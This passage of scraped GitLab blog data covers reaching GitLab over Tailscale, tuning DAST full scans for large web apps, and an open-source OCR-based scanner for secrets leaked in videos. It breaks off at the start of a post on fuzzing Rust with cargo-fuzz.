So how did I get it to work?\n\n## Tailscale and GitLab together\n\nAssuming you already have a GitLab [installation](/install/) up and running on your network, getting it working through Tailscale involves a few steps:\n\n- Installing Tailscale\n- Setting up DNS for the private address\n- Configuring HTTPS encryption\n\n### Installing Tailscale\n\nPackages are [available](https://tailscale.com/kb/1031/install-linux/) for many Linux distributions. To install Tailscale, you can select your [specific distribution](https://tailscale.com/kb/1031/install-linux/) for detailed instructions. There are also [static binaries](https://tailscale.com/kb/1053/install-static/) if you can't find your particular distribution - they are available for x86 and ARM CPUs for both 32- and 64-bit variants.\n\nOnce Tailscale is installed, getting it running is as simple as running the following command on the CLI:\n\n```bash\nsudo tailscale up\n```\n\nThe setup dialogue will walk you through the authentication process and get Tailscale running. After that process, you can see your new IP address for this node on your network with the CLI command `tailscale ip -4`. You'll need that IP address for the next steps.\n\nBy default, Tailscale will set an expiration date for the token it issues to your device during the authentication process. This is desirable for typical devices that may be transient or portable. However, suppose your device is secured inside your home or another secure place AND is a server you're not accessing all the time. In that case, you can optionally [disable key expiry](https://tailscale.com/kb/1028/key-expiry/) for that particular device.\n\n### Setting up DNS\n\nYou should be able to now access your device from any other Tailscale-connected device via the IP address from the last step. However, my goal was to make it easy for me to connect to GitLab, reference it by an URL, and encrypt the traffic end-to-end with TLS. 
As the next step I set up DNS.\n\nEven though the 100.x.y.z address is a private IP address, you can still create a public DNS record and have the hostname to point to it. That won't mean the whole world can access your server - it just means once you're connected to your Tailscale network, you can resolve that hostname to the IP address and access the web server. For me, I set up an A record for `gitpi.boleary.dev` to resolve to an IPv4 address:\n\n```\n;; QUESTION SECTION:\n;gitpi.boleary.dev.\t\tIN\tA\n\n;; ANSWER SECTION:\ngitpi.boleary.dev.\t300\tIN\tA\t100.64.205.40\n```\n\nAn important note here is that I use Cloudflare as my DNS provider - and I usually love Cloudflare's proxying service to make my \"real\" IP addresses private. In this case, you have to disable that proxying to make sure that you can resolve the correct address - Cloudflare can't proxy traffic into your Tailscale network.\n\n### Configuring HTTPS\n\nLastly, configuring HTTPS for your GitLab instance will ensure that all traffic is encrypted end-to-end. While Tailscale encrypts the traffic over the network, this will ensure there are no gaps between your device and your GitLab server.\n\nTo accomplish this, we'll use [`certbot`](https://certbot.eff.org/) from the EFF that lets us create and manage [Let's Encrypt](https://letsencrypt.org/) certificates. First, install `certbot` with `sudo apt install certbot` or follow the [instructions for your distribution](https://certbot.eff.org/instructions).\n\nAfter certbot is installed, issue a certificate to use with GitLab using a DNS challenge. 
Follow the steps to complete the DNS challenge after running this command:\n\n```bash\nsudo certbot certonly --manual --preferred-challenges dns\n```\n\nThe output will show you the specific location of the certificate it created (in my case, in a `gitpi.boleary.dev` folder), and you should link that certificate to GitLab's SSL directory by running:\n\n```bash\nsudo mkdir /etc/gitlab/ssl/\nsudo ln -s /etc/letsencrypt/live/gitpi.boleary.dev/fullchain.pem /etc/gitlab/ssl/gitpi.boleary.dev.crt\nsudo ln -s /etc/letsencrypt/live/gitpi.boleary.dev/privkey.pem /etc/gitlab/ssl/gitpi.boleary.dev.key\n```\n\nNext, configure GitLab to use the new certificate by opening the `gitlab.rb` with\n\n```bash\nsudo vi /etc/gitlab/gitlab.rb\n```\n\nAnd change the `external_url` value to match the URL for the certificate (e.g. `https://gitpi.boleary.dev`). That \"https\" will tell GitLab to enable TLS/SSL and use your linked certificate.\n\n## Finishing up\n\nThat's it! Now with a simple `gitlab-ctl reconfigure`, GitLab will pick up the new certificate and start responding to requests at that URL. From any device - iOS, Android, laptop, etc. 
- connected to your Tailscale network, you can access your GitLab installation (securely) from anywhere!\n",[752,9,231],{"slug":3072,"featured":6,"template":689},"how-to-access-gitlab-on-a-private-network-with-tailscale","content:en-us:blog:how-to-access-gitlab-on-a-private-network-with-tailscale.yml","How To Access Gitlab On A Private Network With Tailscale","en-us/blog/how-to-access-gitlab-on-a-private-network-with-tailscale.yml","en-us/blog/how-to-access-gitlab-on-a-private-network-with-tailscale",{"_path":3078,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3079,"content":3085,"config":3092,"_id":3094,"_type":14,"title":3095,"_source":16,"_file":3096,"_stem":3097,"_extension":19},"/en-us/blog/how-to-configure-dast-full-scans-for-complex-web-applications",{"title":3080,"description":3081,"ogTitle":3080,"ogDescription":3081,"noIndex":6,"ogImage":3082,"ogUrl":3083,"ogSiteName":673,"ogType":674,"canonicalUrls":3083,"schema":3084},"How to configure DAST full scans for complex web applications","Keep your DAST job within timeout limits and fine-tune job configurations for better results","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749679617/Blog/Hero%20Images/tuning-237454.jpg","https://about.gitlab.com/blog/how-to-configure-dast-full-scans-for-complex-web-applications","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How to configure DAST full scans for complex web applications\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Dennis Appelt\"}],\n        \"datePublished\": \"2020-08-31\",\n      }",{"title":3080,"description":3081,"authors":3086,"heroImage":3082,"date":3088,"body":3089,"category":865,"tags":3090},[3087],"Dennis Appelt","2020-08-31","\n\nShifting [Dynamic Application Security Testing](https://docs.gitlab.com/ee/user/application_security/dast/) (DAST) left can help to detect security vulnerabilities earlier in the software development 
lifecycle (SDLC). However, testing earlier and more often in the SDLC comes with its own set of challenges: an abundance of alerts from automated security tools and a high computational cost caused by frequent and long-running CI security jobs.\n\nIn this blog post, I’ll walk you through how we configured DAST for the internal pipeline that tests the GitLab web application. We’ll discuss some of the common challenges that you might encounter when testing large applications, such as: \n\n1. How to keep the duration of the DAST scan within an acceptable [job timeout](https://docs.gitlab.com/ee/ci/pipelines/settings.html#timeout): This matters because jobs that exceed timeouts will fail and no results will be displayed. We will review how to optimize scan duration by excluding low-risk parts of the application from being tested, by correctly seeding your application with test data, and by parallelizing the DAST job.\n\n2. How to get relevant results for your context: This is key – tuning job configurations to produce relevant results allows your engineers to focus on findings that matter and prevents [alert fatigue](https://en.wikipedia.org/wiki/Alarm_fatigue). In this area, we'll discuss criteria for identifying rules that are applicable to your application and we will explain how to disable irrelevant rules.\n\nThe discussed solutions are based on the DAST configuration that we use to test GitLab itself. 
If you are looking for inspiration on how to configure your own DAST jobs, feel free to take a look at our [configuration](https://gitlab.com/gitlab-org/gitlab/-/blob/8b1557c02fe5519ba952ea59c93b84912dd357b4/.gitlab/ci/dast.gitlab-ci.yml).\n\n## How to set up a simple DAST full scan\n\nKicking off a DAST full scan in GitLab CI is as easy as including the job template and setting a few variables in your `.gitlab-ci.yml` file:\n\n```yaml\ninclude:\n  - template: DAST.gitlab-ci.yml\n\nvariables:\n  DAST_WEBSITE: \"https://my-site.example\"\n  DAST_FULL_SCAN_ENABLED: \"true\"\n  DAST_AUTH_URL: \"https://my-site.example/signin\"\n  DAST_AUTH_USERNAME: \"john\"\n  DAST_AUTH_PASSWORD: \"P@ssw0rd\"\n```\nThe variable `DAST_WEBSITE` defines the target website tested by DAST. Setting `DAST_FULL_SCAN_ENABLED: true` instructs DAST to run a [full scan](https://www.zaproxy.org/docs/docker/full-scan/), which is more comprehensive than a [baseline scan](https://www.zaproxy.org/docs/docker/baseline-scan/) and potentially finds more vulnerabilities. There are also other config options that you likely want to define such as authentication-related options (`DAST_AUTH_*`) which are not discussed here. You can check out our DAST [user docs](https://docs.gitlab.com/ee/user/application_security/dast/#available-variables) for a refresher on these config options.\n\nWhen running a DAST full scan against a web application with many pages and input parameters, it is possible that the DAST job will not finish testing the application within the CI job timeout and fail. If this is the case for your DAST job, keep reading to learn about tweaking your job configuration to stay within the timeout.\n\n## How to optimize DAST scan duration\n\nIt is not uncommon that a DAST full scan can take 10 or more hours to complete testing in complex applications. 
To understand how we can reduce the scan duration, we need to take a closer look at how DAST works internally.\n\nDAST job execution is roughly separated into two phases: A spidering phase and a test execution phase. A DAST job starts with spidering, during which it will detect all pages a web application consists of and identify the input parameters on these pages. The spider recursively discovers all pages of an application by visiting the configured target URL (parameter `DAST_WEBSITE`) and by following all URLs found in the page source. These URLs are in turn also searched for URLs in their page source, any new URLs are followed and so on. In a DAST full scan, this procedure is typically repeated until all discovered URLs have been visited.\n\nIn the test execution phase, test rules are executed against the target application to find vulnerabilities. Most of the rules are executed for any of the discovered pages in the spidering phase, leading to a direct relation between the number of executed test cases and the number of discovered pages.\n\nSome rules check for specific CVEs such as [Heartbleed](https://www.zaproxy.org/docs/alerts/20015/) while others are only applicable to applications written in specific languages such as [Java](https://www.zaproxy.org/docs/alerts/90002/), [ASP.net](https://www.zaproxy.org/docs/alerts/10061/), and so on. A DAST full scan will, by default, execute all rules even if the target application’s tech stack is not affected by the vulnerability being tested for.\n\nTo summarize, you can use the following rule of thumb to estimate a DAST job’s scan duration: Number of Tested Pages **x** Number of Executed Rules. \n\nTo optimize scan duration, we will have to tweak these factors.\n\n### How to reduce the number of tested pages\n\nTo understand which pages of our application are tested we can refer to the job log. 
The URLs of all tested pages are listed like in the example below.\n\n```\n2020-08-01 00:25:34,454 The following 2903 URLs were scanned:\nGET https://gitlab-review.app\nGET https://gitlab-review.app/*/*.git\nGET https://gitlab-review.app/help\nGET https://gitlab.com/help/user/index.md\n...\n```\n\nBased on this information we can exclude low-risk pages from being tested. For example, for the GitLab web app we decided to [exclude](https://gitlab.com/gitlab-org/gitlab/-/blob/8b1557c02fe5519ba952ea59c93b84912dd357b4/.gitlab/ci/dast.gitlab-ci.yml#L30) any of the [help pages](https://gitlab.com/help). These pages are mostly static and the application code doesn’t process any user-controlled inputs, which rules out attack categories like SQL injection, XSS etc. Excluding these led to 899 URLs less being spidered and tested, reducing the scan duration significantly.\n\nTo exclude low-risk pages from being tested, you can use the environment variable [DAST_AUTH_EXCLUDE_URLS](https://docs.gitlab.com/ee/user/application_security/dast/#available-variables) as mapped out below:\n\n```yaml\nscript:\n  - 'export DAST_AUTH_EXCLUDE_URLS=\"https://gitlab-review.app/help/.*,https://gitlab-review.app/profile/two_factor_auth\"' \n```\n\n`DAST_AUTH_EXCLUDE_URLS` takes a comma-separated list of URLs to exclude. URLs can contain regular expressions, e.g. `https://gitlab-review.app/help/.*` will exclude any URL that starts with `https://gitlab-review.app/help/`.\n\n### How to populate your app with test data\n\nPopulating your application with test data is important because it allows DAST to discover and test all the functionality of your application. At the same time, you want to avoid adding redundant test data to your application, which would lead to DAST exercising the same code repeatedly.\n\nFor example, we can create multiple [projects](https://docs.gitlab.com/ee/user/project/) in a GitLab instance and each project will be accessible via a unique URL, e.g. 
`https://gitlab.example/awesome-project`, `https://gitlab.example/another-project`, etc. To DAST these look like unrelated pages and it will test each page separately. However, the application code that is processing requests to different projects is largely identical, leading to the same code being tested multiple times. This increases the scan duration and is unlikely to identify more vulnerabilities than testing only a single project would.\n\nIn every pipeline that runs DAST against GitLab, we spin up a fresh GitLab instance as a [review app](https://docs.gitlab.com/ee/ci/review_apps/) and populate it with the test data that we need for the DAST job. If you are looking for a similar solution, you might find the job that is [deploying the review app](https://gitlab.com/gitlab-org/gitlab/-/blob/8b1557c02fe5519ba952ea59c93b84912dd357b4/.gitlab/ci/review.gitlab-ci.yml#L53-83) and seeding it with [test data](https://gitlab.com/gitlab-org/gitlab/-/blob/8b1557c02fe5519ba952ea59c93b84912dd357b4/.gitlab/ci/review.gitlab-ci.yml#L83) interesting.\n\n### Identifying relevant rules for your DAST scan\n\nAs mentioned above, a DAST full scan runs, by default, all rules against any discovered page. Therefore, another way to reduce scan duration is to disable irrelevant rules or rules that you have determined are low-risk for your application context. To determine rule relevance, consider the following:\n\n- Does the rule apply to my web framework?\n- Does the rule apply to my web server?\n- Does the rule apply to my database server?\n- Does the type of vulnerability a rule tests for apply to my application?\n\nFor example, if your application is not built with Java, rules that test for [Java-specific vulnerabilities](https://www.zaproxy.org/docs/alerts/90002/) can be disabled. 
There are many rules that are specific to a web framework, server, or database being used like [Apache HTTP Server](https://www.zaproxy.org/docs/alerts/10053/), [ASP.NET](https://www.zaproxy.org/docs/alerts/10061/), [PostgreSQL](https://www.zaproxy.org/docs/alerts/40022/) etc. If in doubt around which rule(s) are applicable to which tech stack, you can find the information either in the [ZAP user docs](https://www.zaproxy.org/docs/alerts/) or directly in the [rule implementation](https://github.com/zaproxy/zap-extensions/blob/master/addOns/ascanrules/src/main/java/org/zaproxy/zap/extension/ascanrules/CodeInjectionScanRule.java#L86-L91):\n\n```java\npublic boolean targets(TechSet technologies) {\n    if (technologies.includes(Tech.ASP) || technologies.includes(Tech.PHP)) {\n        return true;\n    }\n    return false;\n}\n```\nNote: Most rules classes have a function `targets` that defines to which technologies a rule is applicable.\n\nAnother example of a rule that might not apply to your application is the [PII Disclosure](https://www.zaproxy.org/docs/alerts/10062/) rule if your application does not process any PII.\n\n### Excluding irrelevant rules\n\nThe execution time of individual rules varies substantially. To understand how much time a particular rule adds to the total scan duration and how much we could gain from disabling it, we turn again to the job log. Each rule prints its duration on completion, for example:\n\n```\n[zap.out] 3937350 [Thread-8] INFO org.parosproxy.paros.core.scanner.HostProcess - completed host/plugin https://gitlab-review.app | TestExternalRedirect in 2813.043s with 33151 message(s) sent and 0 alert\n```\n\nFrom this message we learn that rule `TestExternalRedirect` took 47 minutes to complete, hence disabling this rule reduces the scan duration by about 47 minutes.\n\nWe can disable individual rules with the environment variable `DAST_EXCLUDE_RULES`. 
Here is an example:\n\n```yaml\nvariables:\n  DAST_EXCLUDE_RULES: \"41,42,43,10027,...,90019\"\n```\n\n`DAST_EXCLUDE_RULES` takes a comma-separated list of rule ids. You can find the id of a particular rule in the summary printed to the job log:\n\n```\nPASS: External Redirect [20019]\n…\nSUMMARY - PASS: 106 | WARN: 2\n```\n\nWe can see from the log that rule External Redirect, which we found earlier to take 47 minutes, has rule id 20019. To disable this rule in addition to the rules from the previous example, we would need to add it to `DAST_EXCLUDE_RULES` like so: \n\n```yaml\nvariables:\n  DAST_EXCLUDE_RULES: \"20019,41,42,43,10027,...,90019\"\n```\n### Parallelizing DAST jobs to further reduce pipeline duration\n\nTo reduce the total duration of the pipeline that is running the DAST job, we can split up the rules that we want to execute into multiple DAST jobs and run the jobs in parallel. Below is an example that demonstrates how to split up the rules.\n\n```yaml\n# Any configuration that is shared between jobs goes here\n.dast-conf:\n  image:\n    name: \"registry.gitlab.com/gitlab-org/security-products/dast:1.22.1\"\n  services:\n  - name: \"gitlab/gitlab-ee:nightly\"\n    alias: gitlab\n  script:\n  - /analyze -t \"http://gitlab\"\n\n# First DAST job executing rules 6 to 10\ndast-1/2:\n  extends:\n  - .dast-conf\n  variables:\n    DAST_EXCLUDE_RULES: \"1,2,3,4,5\"\n\n# Second DAST job executing rules 1 to 5\ndast-2/2:\n  extends:\n  - .dast-conf\n  variables:\n    DAST_EXCLUDE_RULES: \"6,7,8,9,10\"\n```\n\nFor the sake of brevity, we assume in the example above that our DAST job runs rules with id 1 to 10. As described in the previous section, refer to the job log to find which rules were executed (we are working on printing a tidy [summary of executed rules](https://gitlab.com/gitlab-org/gitlab/-/issues/230893)). The example defines two DAST jobs `dast-1/2` and `dast-2/2`. `dast-1/2` is excluding rules 1 to 5 and, hence, executes rules 6 to 10. 
Vice versa, `dast-2/2` is excluding rules 6 to 10 and, hence, executes rules 1 to 5.\n\nFollowing the same pattern, you can split up the rules into as many jobs as necessary, keeping the rules executed in a job mutually exclusive with respect to all other jobs.\n\nNote that new releases of GitLab DAST may contain new rules, which will get executed if the rule ids are not manually added to `DAST_EXCLUDE_RULES`. In the example above, we pinned the version of the DAST image to a specific version using the `image` keyword. This allows us to review new releases manually and adjust `DAST_EXCLUDE_RULES` as necessary before upgrading to a new DAST version.\n\nWhen running multiple DAST jobs in parallel against the same target application, make sure that the application isn’t overloaded and becomes a bottleneck. If you observe connection timeouts in the DAST job logs, chances are your target site is overloaded. To mitigate this issue, consider spinning up additional instances of your target application and distribute the test load among the instances. GitLab CI offers, through the [`services`](https://docs.gitlab.com/ee/ci/docker/using_docker_images.html#what-is-a-service) keyword, a convenient way of creating a dedicated application instance for each DAST job. In the example above, we start a dedicated GitLab instance for each DAST job with:\n\n```yaml\n  services:\n  - name: \"gitlab/gitlab-ee:nightly\"\n    alias: gitlab\n```\n## Summary\n\nIn this blog post, we walked you through common challenges encountered when testing complex web applications with DAST and solutions that worked well for our internal projects at GitLab. \n\nAs we continue and broaden our use of DAST full scans within GitLab and our Security department, we’re excited to identify vulnerabilities in GitLab earlier in the SDLC and look forward to sharing interesting findings with the community. 
In addition, we take our lessons learned from setting up DAST full scans back to our engineering team to continue improving user experience. We also plan to explore additional dynamic testing techniques such as [fuzzing](https://docs.gitlab.com/ee/user/application_security/coverage_fuzzing/) to complement our DAST results.\n\nIs there a problem area that you’ve encountered or solution for fine-tuning DAST full scans we've missed that's worked well for you? We want to hear about it and would love your feedback below in the comments.\n\nCover image by [Pixabay](https://www.pexels.com/@pixabay) on [Pexels](https://www.pexels.com/photo/blur-bowed-stringed-instrument-classic-classical-237454/)\n{: .note}\n",[865,3091,9],"security research",{"slug":3093,"featured":6,"template":689},"how-to-configure-dast-full-scans-for-complex-web-applications","content:en-us:blog:how-to-configure-dast-full-scans-for-complex-web-applications.yml","How To Configure Dast Full Scans For Complex Web Applications","en-us/blog/how-to-configure-dast-full-scans-for-complex-web-applications.yml","en-us/blog/how-to-configure-dast-full-scans-for-complex-web-applications",{"_path":3099,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3100,"content":3106,"config":3111,"_id":3113,"_type":14,"title":3114,"_source":16,"_file":3115,"_stem":3116,"_extension":19},"/en-us/blog/how-to-detecting-secrets-in-video",{"title":3101,"description":3102,"ogTitle":3101,"ogDescription":3102,"noIndex":6,"ogImage":3103,"ogUrl":3104,"ogSiteName":673,"ogType":674,"canonicalUrls":3104,"schema":3105},"How-to: Detecting secrets in video content ","GitLab’s Security team identifies and mitigates security risks in video content by searching for API keys or other sensitive tokens. 
Here's how we do it (with an assist from AI) and how you can, too.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1750099421/Blog/Hero%20Images/Blog/Hero%20Images/security-checklist_security-checklist.png_1750099421443.png","https://about.gitlab.com/blog/how-to-detecting-secrets-in-video-content","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How-to: Detecting secrets in video content \",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Dennis Appelt\"}],\n        \"datePublished\": \"2024-02-29\",\n      }",{"title":3101,"description":3102,"authors":3107,"heroImage":3103,"date":3108,"body":3109,"category":865,"tags":3110},[3087],"2024-02-29","Today, we are open-sourcing our [solution for detecting secrets in video content]( https://gitlab.com/gitlab-com/gl-security/security-research/video-scanner/youtube-video-scanner). We use it internally to search videos published on our [GitLab Unfiltered YouTube channel](https://www.youtube.com/@GitLabUnfiltered) for [secrets](https://docs.gitlab.com/ee/security/token_overview.html) such as API keys and other sensitive tokens.\n\nWhile there are existing tools for secret detection, we did not find a tool that quite fit the bill for our use case, so we decided to implement a custom scanner. In this blog post, we'll walk through our general approach, some of the challenges we encountered, and our solution. We'll also discuss how GitLab’s new AI assistant, [GitLab Duo Chat](https://about.gitlab.com/gitlab-duo/), helped with the implementation of the scanner.\n\n## Scanning videos, one frame at a time\n\nOur general approach to secret detection in videos is quite simple: Split the video into frames, run optical character recognition (OCR) over each frame, and match the resulting text against known [secret patterns](https://docs.gitlab.com/ee/security/token_overview.html). 
If a secret is found, a [security incident](https://handbook.gitlab.com/handbook/security/security-operations/sirt/engaging-security-on-call/#engage-the-security-engineer-on-call) is kicked off to investigate the leak and revoke exposed secrets.\n\nTo implement this approach, we first experimented using [FFmpeg](https://ffmpeg.org//) for splitting the video into frames and feeding the frames to [Tesseract](https://github.com/tesseract-ocr/tesseract), an open-source engine for OCR. This worked quite well and gave us confidence that the general approach was feasible. However, we decided to switch to [Google Cloud Platform's Video Intelligence API](https://cloud.google.com/video-intelligence/docs/) for the frame splitting and OCR for the simple reason of not having to scale and maintain our own implementation.\n\nFFmpeg and Tesseract are good options if third-party APIs cannot be used or if more control over the process is required. For example, if the secrets are only exposed for a brief moment in the video, using FFmpeg allows you to increase the frame sampling rate to analyze more frames per second and increases the chances of catching the frame that exposes the secret. The Video Intelligence API does not provide a comparable level of control. \n\nThe choice between the Video Intelligence API and FFmpeg + Tesseract also depends on the data set that has to be analyzed. The Video Intelligence API works well on our data set, which makes the additional complexity of a custom implementation based on FFmpeg + Tesseract hard to justify. After settling for the Video Intelligence API, it was a natural choice to host the rest of the scanner on GCP as well. The below diagram gives an overview of the design:\n\n![video content scanners - image 1](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750099431/Blog/Content%20Images/Blog/Content%20Images/image1_aHR0cHM6_1750099431138.png)\n\nThe scanner is implemented as a collection of cloud functions running on GCP. 
The cloud function `WebSub API` implements the WebSub [spec](https://www.w3.org/TR/websub/), which is used by YouTube to deliver notifications. Notifications of new videos are published to a PubSub topic, which the cloud function `Video Fetcher` is subscribed to. If a message is received, the video is downloaded and submitted for OCR to the Video Intelligence API. The resulting text extract is checked for secrets by the `Secret Matcher` and alerts are created in case a secret is found.\n\n## Accounting for inaccuracies in OCR\n\nThe described approach sounds simple enough, but as with most things, the devil is in the details. When comparing the video scanner to other secret scanning methods, a notable difference is how the video scanner determines if a given string literal is a secret. Secret detection tools usually determine if the given text contains a secret by matching the text against a list of regular expressions, each defining the format of a secret. If there is a match, a secret is detected.\n\n![video content scanners - image 2](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750099431/Blog/Content%20Images/Blog/Content%20Images/image2_aHR0cHM6_1750099431139.png)\n\n\u003Ccenter>\u003Ci>A video frame showing a GitLab access token\u003C/i>\u003C/center>\n\n\u003Cp>\u003C/p>\n\nWhen it comes to video scanning, this approach has limited effectiveness due to the OCR step. In some instances, the recognized text does not quite match the text displayed in the video. For example, the above video frame shows the access token `glpat-HseyLLLE92Ubso2vyVeD` and OCR extracted the text `glpat-HseyLLLE92Ubso2vyVe\\`. The last character of the secret is `D`, but OCR extracted a backslash ( `\\`). 
This error causes the extracted text to no longer match the format of GitLab personal access tokens; therefore, simply matching the text against a regular expression conforming to the token format would have not detected the leaked access token.\n\nTo account for the inaccuracies that are introduced by the OCR step, the video scanner uses approximate regular expression matching where a string is not required to match a regular expression exactly, but small deviations in the strings are allowed. These deviations are expressed as string edit distance and define how many characters in the string need to be inserted, deleted, or substituted to make the string match a given regular expression. For example, the string edit distance for the previous example is 1 because the erroneously detected backslash has to be substituted with an alphanumeric character or a minus sign to make the string match the GitLab personal access token format.\n\nFinding the right value for the maximum edit distance for a string to still be considered to match a regular expression depends on the data set and requires some experimentation. If the value is too low, secrets might be missed and if the value is too high, strings that are not secrets will be matched. To find the right balance for our use case, we collected a data set of videos leaking secrets and ran them through our scanner pipeline. We measured precision (how many matches are not secrets) and recall (how many matches are relevant/true secrets) for different maximum edit distances. We collected this data for the two most relevant types of secrets: GitLab API access tokens and runner registration tokens. The below diagrams show the results.\n\nFor both types of secrets, the optimal maximum cost is 2, at which point a high precision and recall are achieved (97% precision and 91% recall for access tokens; 100% precision and 86% recall for runner registration tokens). 
Decreasing the maximum distance results in worse recall, while increasing the maximum cost leads to either no improvement (runner registration token) or adversely affects precision (access tokens).\n\n![video content scanner - image 3](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750099431/Blog/Content%20Images/Blog/Content%20Images/image3_aHR0cHM6_1750099431141.png)\n\n\u003Cp>\u003C/p>\n\n![video content scanner - image 4](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750099431/Blog/Content%20Images/Blog/Content%20Images/image2_aHR0cHM6_1750099431143.png)\n\n## Implementation made easy using GitLab Duo Chat\n\nAfter some initial experimentation, it was clear to us that approximate regular expression matching can increase the detection accuracy of our video scanner. However, the implementation turned out not to be trivial. While the [algorithms for approximate regular expression matching](https://www.tgries.de/agrep/) have existed since the '90s, there is no widespread library support. [TRE](https://laurikari.net/tre/) is a solid choice but is written in C and thus requires bindings to be called from the scanner’s runtime environment (Node.js).\n\nTo reduce the development effort, we turned to [GitLab Duo Chat](https://about.gitlab.com/gitlab-duo/). After discussing our options with Duo Chat for calling C from Node.js, we settled on [implementing a C++ add-on](https://nodejs.org/docs/latest-v20.x/api/addons.html). We quickly iterated towards a working implementation, which would have undoubtedly taken considerably more time without the help of GitLab Duo Chat. Below is an excerpt from the chat session.\n\n> Me: Are you familiar with the C library TRE? 
Can you help me write a Node.js addon that is a wrapper for TRE?\n\n> Duo: Here is the template for wrapping the TRE library in a Node.js addon using N-API:\n>\n>![video content scanner - image 5](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750099431/Blog/Content%20Images/Blog/Content%20Images/Screenshot_2024-02-28_at_9.51.14_AM_aHR0cHM6_1750099431144.png)\n>\n> The key steps are:\n> - Include TRE header\n> - Get tre regex_t from parameters\n> - Use tre_regcomp() to compile pattern\n> - Execute regexec()\n> - Handle TRE match results\n> - Return results back to JavaScript\n>\n> Let me know if this helps explain how to integrate TRE regex usage in a Node.js add-on!\n\n> Me: Ok, now let's add code for the tasks that you outlined in the template. I want to call this C++ from JavaScript like this:\n>\n>![video content scanners - image 6](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750099431/Blog/Content%20Images/Blog/Content%20Images/Screenshot_2024-02-28_at_9.53.05_AM_aHR0cHM6_1750099431145.png)\n>\n> In this example, the first parameter is the regular expression that should be used to create the parameter regex_t *preg, the second parameter is the string that should be matched against the regular expression, and the third parameter is an integer that represents TRE’s max_cost.\n\n>Duo: Here is example C++ code implementing TRE regex usage to match the provided JavaScript code snippet.\n>\n>![video content scanners - image 7](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750099431/Blog/Content%20Images/Blog/Content%20Images/Screenshot_2024-02-28_at_9.54.08_AM_aHR0cHM6_1750099431146.png)\n>\n> Let me know if you need any clarification on this implementation!\n\n> Me: Thank you for the code. 
Can you change the call tre_regexec to tre_regaexec?\n\n> Duo: Here is the code updated to use tre_regaexec instead of tre_regexec:\n>\n>![code updated to use tre_regaexec instead of tre_regexec](https://res.cloudinary.com/about-gitlab-com/image/upload/v1750099431/Blog/Content%20Images/Blog/Content%20Images/Screenshot_2024-02-28_at_9.56.29_AM_aHR0cHM6_1750099431146.png)\n>\n> The key changes are:\n> - Using `tre_regaexec` instead of `tre_regexec`\n> - Initializing a `regamatch_t` instead of `regmatch_t`\n> - Passing a regaparams_t struct to configure match parameters\n> \n> Let me know if you need any clarification or have additional questions!\n\nWhile the code generation capabilities are very impressive and save a lot of time, the generated code needs review and sometimes correction. For example, in our session with Duo Chat it is prompted to call [tre_regaexec](https://laurikari.net/tre/documentation/regaexec/), but the generated code is calling the similarly named, but distinct function [tre_regexec](https://laurikari.net/tre/documentation/regexec/). Typically it is enough to make Duo Chat aware of its mistake and it will correct the code in question. In this respect, working with Duo Chat feels like pair programming rather than fully outsourcing a programming task.\n\nThe full add-on code is available [here](https://gitlab.com/gitlab-com/gl-security/security-research/video-scanner/tre-node-bindings/).\n\n## Try our open-source implementation\n\nWe are [making the implementation of the scanner open source](https://gitlab.com/gitlab-com/gl-security/security-research/video-scanner/youtube-video-scanner) under the MIT license. We hope this solution can help you with detecting secrets in your own video content. 
Please [share your feedback in an issue](https://gitlab.com/gitlab-com/gl-security/security-research/video-scanner/youtube-video-scanner/-/issues/new).",[752,9,865],{"slug":3112,"featured":91,"template":689},"how-to-detecting-secrets-in-video-content","content:en-us:blog:how-to-detecting-secrets-in-video.yml","How To Detecting Secrets In Video","en-us/blog/how-to-detecting-secrets-in-video.yml","en-us/blog/how-to-detecting-secrets-in-video",{"_path":3118,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":3119,"content":3125,"config":3131,"_id":3133,"_type":14,"title":3134,"_source":16,"_file":3135,"_stem":3136,"_extension":19},"/en-us/blog/how-to-fuzz-rust-code",{"title":3120,"description":3121,"ogTitle":3120,"ogDescription":3121,"noIndex":6,"ogImage":3122,"ogUrl":3123,"ogSiteName":673,"ogType":674,"canonicalUrls":3123,"schema":3124},"How to fuzz Rust code continuously","Learn why you should always fuzz test your Rust code, and the code you'll need to do it.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749681441/Blog/Hero%20Images/rust.jpg","https://about.gitlab.com/blog/how-to-fuzz-rust-code","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How to fuzz Rust code continuously\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Yevgeny Pats\"}],\n        \"datePublished\": \"2020-12-03\",\n      }",{"title":3120,"description":3121,"authors":3126,"heroImage":3122,"date":3128,"body":3129,"category":801,"tags":3130},[3127],"Yevgeny Pats","2020-12-03","\n\nThis blog post was originally published on the GitLab Unfiltered blog. 
It was reviewed and republished on 2020-12-17.\n{: .alert .alert-info .note}\n\n## What is fuzzing?\n\nFuzzing, also called [fuzz testing](/topics/devsecops/what-is-fuzz-testing/), is an automated software technique that involves providing semi-random data as an input to the test program in order to uncover bugs and crashes.\n\nIn this short tutorial we will discuss using `cargo-fuzz` for fuzzing Rust code.\n\n## Why fuzz Rust code?\n[Rust](https://www.rust-lang.org/) is a safe language (mostly) and memory corruption issues are a thing of the past so we don’t need to fuzz our code, right? Wrong!\nAny code, and especially where stability, quality, and coverage are important, is worth fuzzing.\nFuzzing can uncover logical bugs and denial-of-service issues in critical components that can lead to security issues as well.\n\nFor a reference to the almost endless number of bugs found with cargo-fuzz (only the documented ones), you can look at [the list of bugs found by fuzz-testing Rust codebases](https://github.com/rust-fuzz/trophy-case).\n\n## Cargo-fuzz\n\ncargo-fuzz is the current de-facto standard fuzzer for Rust and essentially it is a proxy layer to the well-tested [libFuzzer](https://llvm.org/docs/LibFuzzer.html) engine.\nThis means the 